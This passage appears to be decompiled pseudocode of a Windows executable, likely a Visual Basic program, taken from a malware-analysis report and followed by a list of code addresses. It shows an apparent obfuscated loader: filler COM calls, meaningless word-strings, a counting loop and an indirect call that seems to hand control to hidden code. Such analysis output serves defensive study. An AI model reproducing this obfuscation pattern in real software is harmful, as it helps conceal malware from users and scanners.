					_push(L"NzXRmXMzPSdU58");
					_push(_v244);
					L004018FA();
					_t1442 = _t1442 + 0x3c;
				}
				_v8 = 0xe;
				_t1003 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
				_v596 = _t1003;
				if(_v596 >= 0) {
					_t111 =  &_v644;
					 *_t111 = _v644 & 0x00000000;
					__eflags =  *_t111;
				} else {
					_push(0x718);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v644 = _t1003;
				}
				_v80 = _v564;
				_v8 = 0xf;
				 *((intOrPtr*)( *_a4 + 0x738))(_a4);
				_v8 = 0x10;
				_v556 = 0x41cc;
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, L"samtaleemnetsrhes",  &_v556, 0x75dd00, 0x6d83);
				_v8 = 0x11;
				_v584 =  *0x401468;
				_t1015 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x8904d3f8,  &_v584, 0x6cab, 0x98e72e79,  &_v592);
				_v596 = _t1015;
				if(_v596 >= 0) {
					_t137 =  &_v648;
					 *_t137 = _v648 & 0x00000000;
					__eflags =  *_t137;
				} else {
					_push(0x708);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v648 = _t1015;
				}
				_v76 = _v592;
				_v72 = _v588;
				_v8 = 0x12;
				_v584 =  *0x401460;
				_t1022 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x717675,  &_v584, 0x3f22, 0x98e72e79,  &_v592);
				_v596 = _t1022;
				if(_v596 >= 0) {
					_t155 =  &_v652;
					 *_t155 = _v652 & 0x00000000;
					__eflags =  *_t155;
				} else {
					_push(0x708);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v652 = _t1022;
				}
				_v260 = _v592;
				_v256 = _v588;
				_v8 = 0x13;
				_t1027 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1027;
				if(_v596 >= 0) {
					_t170 =  &_v656;
					 *_t170 = _v656 & 0x00000000;
					__eflags =  *_t170;
				} else {
					_push(0x6f8);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v656 = _t1027;
				}
				_v8 = 0x14;
				_v556 = 0x1854;
				_v584 =  *0x401458;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x8904d3f8,  &_v556,  &_v592);
				_v60 = _v592;
				_v8 = 0x15;
				_v556 = 0x5bd9;
				_v584 =  *0x401450;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
				_v276 = _v560;
				_v8 = 0x16;
				_t1044 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
				_v596 = _t1044;
				if(_v596 >= 0) {
					_t204 =  &_v660;
					 *_t204 = _v660 & 0x00000000;
					__eflags =  *_t204;
				} else {
					_push(0x6fc);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v660 = _t1044;
				}
				_v148 = _v556;
				_v8 = 0x17;
				_t1049 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
				_v596 = _t1049;
				if(_v596 >= 0) {
					_t218 =  &_v664;
					 *_t218 = _v664 & 0x00000000;
					__eflags =  *_t218;
				} else {
					_push(0x718);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v664 = _t1049;
				}
				_v228 = _v564;
				_v8 = 0x18;
				L004018F4();
				_v556 = 0x5b73;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
				_v68 = _v584;
				L00401924();
				_v8 = 0x19;
				_v556 = 0x44eb;
				_v584 =  *0x401448;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x98e72e79,  &_v556,  &_v592);
				_v240 = _v592;
				_v8 = 0x1a;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
				_v180 = _v584;
				_v8 = 0x1b;
				_t1068 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1068;
				if(_v596 >= 0) {
					_t261 =  &_v668;
					 *_t261 = _v668 & 0x00000000;
					__eflags =  *_t261;
				} else {
					_push(0x6f8);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v668 = _t1068;
				}
				_v8 = 0x1c;
				L004018F4();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x1bd458,  &_v312, 0x5dfa,  &_v584);
				_v108 = _v584;
				_t1373 =  &_v312;
				L00401924();
				_v8 = 0x1d;
				_v564 = 0x98e72e79;
				_v584 =  *0x401440;
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v584, 0x53f0,  &_v564, 0x63dcbf);
				_v8 = 0x1e;
				_t1081 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1081;
				if(_v596 >= 0) {
					_t290 =  &_v672;
					 *_t290 = _v672 & 0x00000000;
					__eflags =  *_t290;
				} else {
					_push(0x6f8);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v672 = _t1081;
				}
				_v8 = 0x1f;
				_v556 = 0x66dc;
				_v400 =  *0x401438;
				 *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v556, _t1373, 0x8904d3f8,  &_v584);
				_v308 = _v584;
				_v304 = _v580;
				_v8 = 0x20;
				_v564 = 0x8904d3f8;
				_v432 =  *0x401430;
				_t1092 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1373, _t1373,  &_v564, 0xf1, 0xcdba990, 0x5b00);
				_v596 = _t1092;
				if(_v596 >= 0) {
					_t314 =  &_v676;
					 *_t314 = _v676 & 0x00000000;
					__eflags =  *_t314;
				} else {
					_push(0x70c);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v676 = _t1092;
				}
				_v8 = 0x21;
				_t1095 =  *((intOrPtr*)( *_a4 + 0x700))(_a4);
				_v596 = _t1095;
				if(_v596 >= 0) {
					_t325 =  &_v680;
					 *_t325 = _v680 & 0x00000000;
					__eflags =  *_t325;
				} else {
					_push(0x700);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v680 = _t1095;
				}
				_v8 = 0x22;
				_v556 = 0x86;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x86,  &_v556, 0x5b0c);
				_v8 = 0x23;
				_v584 =  *0x401428;
				 *_t1442 =  *0x401420;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x462b,  &_v584, _t1373,  &_v556);
				_v272 = _v556;
				_v8 = 0x24;
				_v556 = 0x59;
				_v584 =  *0x401418;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x5b0c,  &_v584,  &_v556,  &_v560);
				_v116 = _v560;
				_v8 = 0x25;
				_v584 =  *0x401410;
				 *_t1442 =  *0x401408;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x69,  &_v584, _t1373,  &_v556);
				_v268 = _v556;
				_v8 = 0x26;
				_v564 = 0x98e72e79;
				 *_t1442 =  *0x401400;
				_t1122 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1373, _t1373,  &_v564, 0x12, 0xb33c5640, 0x5b05);
				_v596 = _t1122;
				if(_v596 >= 0) {
					_t373 =  &_v684;
					 *_t373 = _v684 & 0x00000000;
					__eflags =  *_t373;
				} else {
					_push(0x70c);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v684 = _t1122;
				}
				_v8 = 0x27;
				_t1125 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1125;
				if(_v596 >= 0) {
					_t384 =  &_v688;
					 *_t384 = _v688 & 0x00000000;
					__eflags =  *_t384;
				} else {
					_push(0x6f8);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v688 = _t1125;
				}
				_v8 = 0x28;
				_v556 = 0x1a82;
				_v584 =  *0x4013f8;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x596b,  &_v584,  &_v556,  &_v560);
				_v112 = _v560;
				_v8 = 0x29;
				_v564 = 0x2329eb;
				_t399 =  &_v564; // 0x2329eb
				_v592 =  *0x4013f0;
				_t1136 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1373, _t1373, _t399, 0x9d, 0x3b889c20, 0x5b06);
				_v596 = _t1136;
				if(_v596 >= 0) {
					_t408 =  &_v692;
					 *_t408 = _v692 & 0x00000000;
					__eflags =  *_t408;
				} else {
					_push(0x70c);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v692 = _t1136;
				}
				_v8 = 0x2a;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
				_v140 = _v584;
				_v8 = 0x2b;
				_v556 = 0x1fe;
				_v584 =  *0x4013e8;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x1d56,  &_v584,  &_v556,  &_v560);
				_v224 = _v560;
				_v8 = 0x2c;
				_v556 = 0x37b;
				_v564 =  *0x4013e0;
				_v632 =  *0x4013d8;
				_t432 =  &_v564; // 0x2329eb
				 *((intOrPtr*)( *_a4 + 0x758))(_a4, _t432, 0xdbe6dc20, 0x5af4,  &_v556, _t1373, _t1373);
				_v8 = 0x2d;
				_t1156 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
				_v596 = _t1156;
				if(_v596 >= 0) {
					_t446 =  &_v696;
					 *_t446 = _v696 & 0x00000000;
					__eflags =  *_t446;
				} else {
					_push(0x6fc);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v696 = _t1156;
				}
				_v192 = _v556;
				_v8 = 0x2e;
				_t1160 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1160;
				if(_v596 >= 0) {
					_t459 =  &_v700;
					 *_t459 = _v700 & 0x00000000;
					__eflags =  *_t459;
				} else {
					_push(0x6f8);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v700 = _t1160;
				}
				_v8 = 0x2f;
				L004018F4();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x8904d3f8,  &_v312, 0x742e,  &_v584);
				_v220 = _v584;
				_t1375 =  &_v312;
				L00401924();
				_v8 = 0x30;
				_v564 = 0x8904d3f8;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v564, 0x98e72e79,  &_v584);
				_v212 = _v584;
				_v208 = _v580;
				_v8 = 0x31;
				_v584 =  *0x4013d0;
				_v708 =  *0x4013c8;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x3a20,  &_v584, _t1375,  &_v556);
				_v172 = _v556;
				_v8 = 0x32;
				_t1182 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v584);
				_v596 = _t1182;
				if(_v596 >= 0) {
					_t501 =  &_v704;
					 *_t501 = _v704 & 0x00000000;
					__eflags =  *_t501;
				} else {
					_push(0x710);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v704 = _t1182;
				}
				_v252 = _v584;
				_v248 = _v580;
				_v8 = 0x33;
				_v584 =  *0x4013c0;
				_t1189 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x98e72e79,  &_v584, 0x3457, 0x98e72e79,  &_v592);
				_v596 = _t1189;
				if(_v596 >= 0) {
					_t519 =  &_v708;
					 *_t519 = _v708 & 0x00000000;
					__eflags =  *_t519;
				} else {
					_push(0x708);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v708 = _t1189;
				}
				_v300 = _v592;
				_v296 = _v588;
				_v8 = 0x34;
				_v584 =  *0x4013b8;
				_v760 =  *0x4013b4;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x2821,  &_v584, _t1375,  &_v556);
				_v168 = _v556;
				_v8 = 0x35;
				_v556 = 0x4ea1;
				_v564 = 0x8904d3f8;
				_t1203 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v564,  &_v556,  &_v568);
				_v596 = _t1203;
				if(_v596 >= 0) {
					_t548 =  &_v712;
					 *_t548 = _v712 & 0x00000000;
					__eflags =  *_t548;
				} else {
					_push(0x714);
					_push(0x4101ac);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v712 = _t1203;
				}
				_v204 = _v568;
				_v8 = 0x36;
				L004018EE();
				_v8 = 0x37;
				_t1207 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v556, 0xffffffff);
				asm("fclex");
				_v596 = _t1207;
				if(_v596 >= 0) {
					_t563 =  &_v716;
					 *_t563 = _v716 & 0x00000000;
					__eflags =  *_t563;
				} else {
					_push(0x1b8);
					_push(0x41017c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v716 = _t1207;
				}
				_t1213 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
				asm("fclex");
				_v600 = _t1213;
				if(_v600 >= 0) {
					_t574 =  &_v720;
					 *_t574 = _v720 & 0x00000000;
					__eflags =  *_t574;
				} else {
					_push(0x1bc);
					_push(0x41017c);
					_push(_a4);
					_push(_v600);
					L00401906();
					_v720 = _t1213;
				}
				_v8 = 0x38;
				_v448 = _v448 & 0x00000000;
				_v444 = _v444 & 0x00000000;
				_v456 = 6;
				L004018E8();
				while(1) {
					_v8 = 0x3a;
					_v448 = 1;
					_v456 = 2;
					L004018E2();
					_t1377 =  &_v132;
					L004018E8();
					_v8 = 0x3b;
					_v556 = 0x1e2c;
					_v564 =  *0x4013b0;
					 *_t1442 =  *0x4013a8;
					 *((intOrPtr*)( *_a4 + 0x758))(_a4,  &_v564, 0x539a9640, 0x5af4,  &_v556, _t1377, _t1377,  &_v344,  &_v456,  &_v132);
					_v8 = 0x3c;
					_t1225 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v564);
					_v596 = _t1225;
					if(_v596 >= 0) {
						_t609 =  &_v724;
						 *_t609 = _v724 & 0x00000000;
						__eflags =  *_t609;
					} else {
						_push(0x704);
						_push(0x4101ac);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v724 = _t1225;
					}
					_v100 = _v564;
					_v8 = 0x3d;
					 *((intOrPtr*)( *_a4 + 0x738))(_a4);
					_v8 = 0x3e;
					_t1231 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
					_v596 = _t1231;
					if(_v596 >= 0) {
						_t626 =  &_v728;
						 *_t626 = _v728 & 0x00000000;
						__eflags =  *_t626;
					} else {
						_push(0x6f8);
						_push(0x4101ac);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v728 = _t1231;
					}
					_v8 = 0x3f;
					_v556 = 0x1854;
					_v584 =  *0x401458;
					 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0xbb1ac,  &_v556,  &_v592);
					_v292 = _v592;
					_v8 = 0x40;
					_v556 = 0x5bd9;
					_v584 =  *0x401450;
					 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
					_v284 = _v560;
					_v8 = 0x41;
					_t1248 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
					_v596 = _t1248;
					if(_v596 >= 0) {
						_t660 =  &_v732;
						 *_t660 = _v732 & 0x00000000;
						__eflags =  *_t660;
					} else {
						_push(0x6fc);
						_push(0x4101ac);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v732 = _t1248;
					}
					_v280 = _v556;
					_v8 = 0x42;
					_t1253 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
					_v596 = _t1253;
					if(_v596 >= 0) {
						_t674 =  &_v736;
						 *_t674 = _v736 & 0x00000000;
						__eflags =  *_t674;
					} else {
						_push(0x718);
						_push(0x4101ac);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v736 = _t1253;
					}
					_v232 = _v564;
					_v8 = 0x43;
					L004018F4();
					_v556 = 0x5b73;
					 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
					_t1520 = _v584;
					_v48 = _t1520;
					L00401924();
					_v8 = 0x44;
					_v448 = 0x2ffff;
					_v456 = 0x8003;
					_push( &_v132);
					_t1261 =  &_v456;
					_push(_t1261);
					L004018DC();
					_t1262 = _t1261;
					if(_t1262 == 0) {
						break;
					}
				}
				_v8 = 0x47;
				_v448 = 0xe8;
				do {
					_t1262 = _t1262 + 1;
					__eflags = _t1262 - 0xfff9a464;
				} while (_t1262 != 0xfff9a464);
				 *_t1442(_t1262 + 0x46f11c);
				asm("movsb");
				L004018E8();
				_v8 = 0x48;
				_v572 = 0x8904d3f8;
				_v568 = 0x98e72e79;
				_v564 = 0x5f72a;
				_push(0x98e72e79);
				_push(L"bangsternears");
				_t1265 =  &_v320;
				_push(_t1265);
				L004018D6();
				_push(_t1265);
				_push( &_v572);
				_push( &_v568);
				_push( &_v564);
				_push(0x8310a4);
				_push(L"samtaleemnetsrhes");
				_t1269 =  &_v316;
				_push(_t1269);
				L004018D6();
				_push(_t1269);
				_push(L"Charcuterieganocephalantu");
				_t1270 =  &_v312;
				_push(_t1270);
				L004018D6();
				_push(_t1270);
				E004111E8();
				_v576 = _t1270;
				L004018D0();
				__eflags = _v576 - 0x8904d3f8;
				_v596 =  ~(0 | _v576 == 0x8904d3f8);
				_push( &_v320);
				_push( &_v316);
				_push( &_v312);
				_push(3);
				L004018CA();
				_t1443 = _t1442 + 0x10;
				__eflags = _v596;
				if(_v596 != 0) {
					_v8 = 0x49;
					_v8 = 0x4a;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v740 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v740 = 0x4183d8;
					}
					_v596 =  *_v740;
					_t1354 =  &_v344;
					L004018B2();
					_t1443 = _t1443 + 0x10;
					L004018B8();
					_t1355 =  &_v324;
					L004018BE();
					_t1358 =  *((intOrPtr*)( *_v596 + 0xc))(_v596, _t1355, _t1355, _t1354, _t1354, _t1354, _v164, L"M9uACtmJ7nAtSvje8kbN9w249", 0);
					asm("fclex");
					_v600 = _t1358;
					__eflags = _v600;
					if(_v600 >= 0) {
						_t733 =  &_v744;
						 *_t733 = _v744 & 0x00000000;
						__eflags =  *_t733;
					} else {
						_push(0xc);
						_push(0x4116c4);
						_push(_v596);
						_push(_v600);
						L00401906();
						_v744 = _t1358;
					}
					L004018AC();
					L00401912();
				}
				_v8 = 0x4c;
				_v564 = 0x792720;
				_t739 =  &_v564; // 0x792720
				_push(L"bangsternears");
				_t1279 =  &_v312;
				_push(_t1279);
				L004018D6();
				_push(_t1279);
				E00411250();
				_v556 = _t1279;
				L004018D0();
				asm("sbb eax, eax");
				_v596 =  ~( ~(_v556 - 0x8904d3f8) + 1);
				L00401924();
				__eflags = _v596;
				if(_v596 != 0) {
					_v8 = 0x4d;
					_v8 = 0x4e;
					_v448 = L"rebslagerierneshand";
					_v456 = 8;
					_v480 = 0x6e5392;
					_v488 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25");
					_push(_v40);
					L004018FA();
					_t1443 = _t1443 + 0x2c;
				}
				_v8 = 0x50;
				_push(0x8904d3f8);
				_push(L"Statscheferstronhi8");
				_t1286 =  &_v316;
				_push(_t1286);
				L004018D6();
				_push(_t1286);
				_push(L"encryptions");
				_t1287 =  &_v312;
				_push(_t1287);
				L004018D6();
				_push(_t1287);
				_push(0x753eca);
				_push(0x3db7db);
				_push(0x8904d3f8);
				E00411290();
				_v564 = _t1287;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				_v596 =  ~(0 | _v564 == 0x98e72e79);
				_push( &_v316);
				_push( &_v312);
				_push(2);
				L004018CA();
				_t1444 = _t1443 + 0xc;
				_t1293 = _v596;
				__eflags = _t1293;
				if(_t1293 != 0) {
					_v8 = 0x51;
					_v8 = 0x52;
					_push(0);
					_push(L"sykofanter");
					_push( &_v344);
					L00401918();
					_t1293 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v264);
					L0040191E();
					L00401912();
				}
				_v8 = 0x54;
				_push(0x3a3aea);
				_push(0x8904d3f8);
				_push(0x98e72e79);
				_push(0x98e72e79);
				E004112E0();
				_v564 = _t1293;
				L004018D0();
				__eflags = _v564 - 0x404672;
				if(_v564 == 0x404672) {
					_v8 = 0x55;
					_v8 = 0x56;
					_v448 = L"rebslagerierneshand";
					_v456 = 8;
					L004018A0();
					_push(2);
					_t1293 =  &_v344;
					_push(_t1293);
					L004018A6();
					_v200 = _t1520;
					L00401912();
				}
				_v8 = 0x58;
				_push(0x350dde);
				_push(0x58e1c9);
				E00411330();
				_v564 = _t1293;
				L004018D0();
				__eflags = _v564 - 0x5bdd58;
				if(_v564 == 0x5bdd58) {
					_v8 = 0x59;
					_v384 = 0x80020004;
					_v392 = 0xa;
					_v368 = 0x80020004;
					_v376 = 0xa;
					_v352 = 0x80020004;
					_v360 = 0xa;
					_v448 = L"Charcuterieganocephalantu";
					_v456 = 8;
					L004018A0();
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push(0);
					_push( &_v344);
					L0040189A();
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_t1293 =  &_v344;
					_push(_t1293);
					_push(4);
					L00401942();
					_t1444 = _t1444 + 0x14;
				}
				_v8 = 0x5b;
				L004018F4();
				_push(_t1293);
				_push( &_v316);
				L004018D6();
				_push(0x8904d3f8);
				_t1295 =  &_v316;
				_push(_t1295);
				E004113A4();
				_v564 = _t1295;
				L004018D0();
				__eflags = _v564 - 0x272878;
				_v596 =  ~(0 | _v564 == 0x00272878);
				_push( &_v316);
				_push( &_v312);
				_push(2);
				L004018CA();
				_t1301 = _v596;
				__eflags = _t1301;
				if(_t1301 != 0) {
					_v8 = 0x5c;
					_push(L"LAANELOFTERNE");
					L00401894();
				}
				_v8 = 0x5e;
				_push(0x8904d3f8);
				_push(0xd2930);
				E004113F0();
				_v564 = _t1301;
				L004018D0();
				__eflags = _v564 - 0x8904d3f8;
				if(_v564 == 0x8904d3f8) {
					_v8 = 0x5f;
					_v448 = L"samtaleemnetsrhes";
					_v456 = 8;
					L004018A0();
					_push( &_v344);
					L0040188E();
					L00401912();
				}
				_v8 = 0x61;
				_push(L"Gooiest4");
				_t1302 =  &_v312;
				_push(_t1302);
				L004018D6();
				_push(_t1302);
				_push(0x98e72e79);
				E00411434();
				_v564 = _t1302;
				L004018D0();
				__eflags = _v564 - 0x86be28;
				_v596 =  ~(0 | _v564 == 0x0086be28);
				L00401924();
				_t1306 = _v596;
				__eflags = _t1306;
				if(_t1306 != 0) {
					_v8 = 0x62;
					_v8 = 0x63;
					_v448 = L"Porto7";
					_v456 = 8;
					L004018A0();
					_push(2);
					_t1306 =  &_v344;
					_push(_t1306);
					L004018A6();
					_v160 = _t1520;
					L00401912();
				}
				_v8 = 0x65;
				_push(0x753f16);
				_push(0x98e72e79);
				_push(0x49db89);
				E00411478();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				if(_v564 == 0x98e72e79) {
					_v8 = 0x66;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v748 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v748 = 0x4183d8;
					}
					_v596 =  *_v748;
					_t1338 =  &_v324;
					L004018BE();
					_t1306 =  *((intOrPtr*)( *_v596 + 0x10))(_v596, _t1338, _t1338, _a4);
					asm("fclex");
					_v600 = _t1306;
					__eflags = _v600;
					if(_v600 >= 0) {
						_t865 =  &_v752;
						 *_t865 = _v752 & 0x00000000;
						__eflags =  *_t865;
					} else {
						_push(0x10);
						_push(0x4116c4);
						_push(_v596);
						_push(_v600);
						L00401906();
						_v752 = _t1306;
					}
					L004018AC();
				}
				_v8 = 0x68;
				_push(0x2a551);
				_push(0x98e72e79);
				_push(0x8904d3f8);
				E004114C0();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x8904d3f8;
				if(_v564 == 0x8904d3f8) {
					_v8 = 0x69;
					_t1329 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v324);
					asm("fclex");
					_v596 = _t1329;
					__eflags = _v596;
					if(_v596 >= 0) {
						_t881 =  &_v756;
						 *_t881 = _v756 & 0x00000000;
						__eflags =  *_t881;
					} else {
						_push(0x160);
						_push(0x41017c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v756 = _t1329;
					}
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v760 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v760 = 0x4183d8;
					}
					_v600 =  *_v760;
					_v628 = _v324;
					_v324 = _v324 & 0x00000000;
					_t1333 =  &_v328;
					L00401888();
					_t1306 =  *((intOrPtr*)( *_v600 + 0x40))(_v600, _t1333, _t1333, _v628, L"incomprehensible");
					asm("fclex");
					_v604 = _t1306;
					__eflags = _v604;
					if(_v604 >= 0) {
						_t901 =  &_v764;
						 *_t901 = _v764 & 0x00000000;
						__eflags =  *_t901;
					} else {
						_push(0x40);
						_push(0x4116c4);
						_push(_v600);
						_push(_v604);
						L00401906();
						_v764 = _t1306;
					}
					L004018AC();
				}
				_v8 = 0x6b;
				_push(0x8904d3f8);
				E00411508();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				if(_v564 == 0x98e72e79) {
					_v8 = 0x6c;
					_v8 = 0x6d;
					_v432 = 0x80020004;
					_v440 = 0xa;
					_v416 = 0x80020004;
					_v424 = 0xa;
					_v400 = 0x80020004;
					_v408 = 0xa;
					_v384 = 0x80020004;
					_v392 = 0xa;
					_v368 = 0x80020004;
					_v376 = 0xa;
					_v352 = 0x80020004;
					_v360 = 0xa;
					_v448 = L"samtaleemnetsrhes";
					_v456 = 8;
					L004018A0();
					_push( &_v440);
					_push( &_v424);
					_push( &_v408);
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push( &_v344);
					L0040187C();
					L00401882();
					_push( &_v440);
					_push( &_v424);
					_push( &_v408);
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push( &_v344);
					_push(7);
					L00401942();
				}
				_v8 = 0x6f;
				_push(L"Gastriloquy");
				_t1307 =  &_v312;
				_push(_t1307);
				L004018D6();
				_push(_t1307);
				E00411564();
				_v564 = _t1307;
				L004018D0();
				__eflags = _v564 - 0x2ee60b;
				_v596 =  ~(0 | _v564 == 0x002ee60b);
				L00401924();
				_t1311 = _v596;
				__eflags = _t1311;
				if(__eflags != 0) {
					_v8 = 0x70;
					_v8 = 0x71;
					_push(0x1c);
					L00401876();
					_v144 = _t1311;
				}
				_v8 = 0x73;
				asm("fldz");
				L00401756();
				L0040193C();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v8 = 0x74;
					L00401870();
				}
				_v20 = 0;
				asm("wait");
				_push(0x41461b);
				L004018AC();
				L004018AC();
				L00401912();
				L00401912();
				L00401924();
				L004018AC();
				L004018AC();
				L004018AC();
				return _t1311;
			}

0x00412577
0x00412586
0x00412592
0x0041259a
0x0041259d
0x004125aa
0x004125b3
0x004125b6
0x004125c5
0x004125c8
0x004125cf
0x004125d6
0x004125e0
0x004125ea
0x004125f4
0x004125fe
0x00412608
0x00412618
0x0041261f
0x00412626
0x00412627
0x0041262f
0x00412632
0x00412636
0x00412639
0x0041263d
0x00412640
0x00412645
0x00412651
0x00412658
0x0041265f
0x00412660
0x00412662
0x00412667
0x0041266a
0x00412671
0x0041267b
0x00412685
0x0041268f
0x00412699
0x00412699
0x004126a0
0x004126aa
0x004126b4
0x004126c4
0x004126cb
0x004126d2
0x004126d9
0x004126e0
0x004126e1
0x004126ec
0x004126ed
0x004126f3
0x004126f4
0x004126f9
0x004126fa
0x004126ff
0x00412704
0x0041270a
0x0041270c
0x0041270d
0x0041271b
0x0041271b
0x0041271b
0x0041270f
0x0041270f
0x0041270f
0x0041272a
0x00412731
0x00412737
0x00412742
0x00412749
0x00412750
0x00412757
0x0041275e
0x0041275f
0x00412761
0x00412766
0x00412769
0x00412772
0x00412774
0x0041277b
0x00412782
0x00412784
0x0041278f
0x00412790
0x00412797
0x00412798
0x004127a5
0x004127a6
0x004127a7
0x004127a8
0x004127a9
0x004127ab
0x004127ae
0x004127b3
0x004127b9
0x004127b9
0x004127be
0x004127c5
0x004127ca
0x004127d3
0x004127d5
0x004127e6
0x004127ec
0x004127ee
0x004127f4
0x004127fb
0x0041281d
0x0041281d
0x0041281d
0x004127fd
0x004127fd
0x00412802
0x00412807
0x0041280a
0x00412810
0x00412815
0x00412815
0x004127fb
0x00412824
0x0041282b
0x00412835
0x0041283f
0x00412849
0x00412859
0x00412860
0x00412861
0x00412863
0x00412864
0x00412865
0x00412868
0x0041286a
0x0041286b
0x0041286c
0x0041286f
0x00412871
0x00412872
0x00412873
0x00412876
0x0041287b
0x00412880
0x00412886
0x00412888
0x00412889
0x00412897
0x00412897
0x00412897
0x0041288b
0x0041288b
0x0041288b
0x004128a6
0x004128b3
0x004128ba
0x004128bb
0x004128bd
0x004128c2
0x004128ce
0x004128d4
0x004128db
0x004128e5
0x004128eb
0x004128f5
0x004128ff
0x00412909
0x00412913
0x0041291d
0x00412920
0x0041292d
0x0041292e
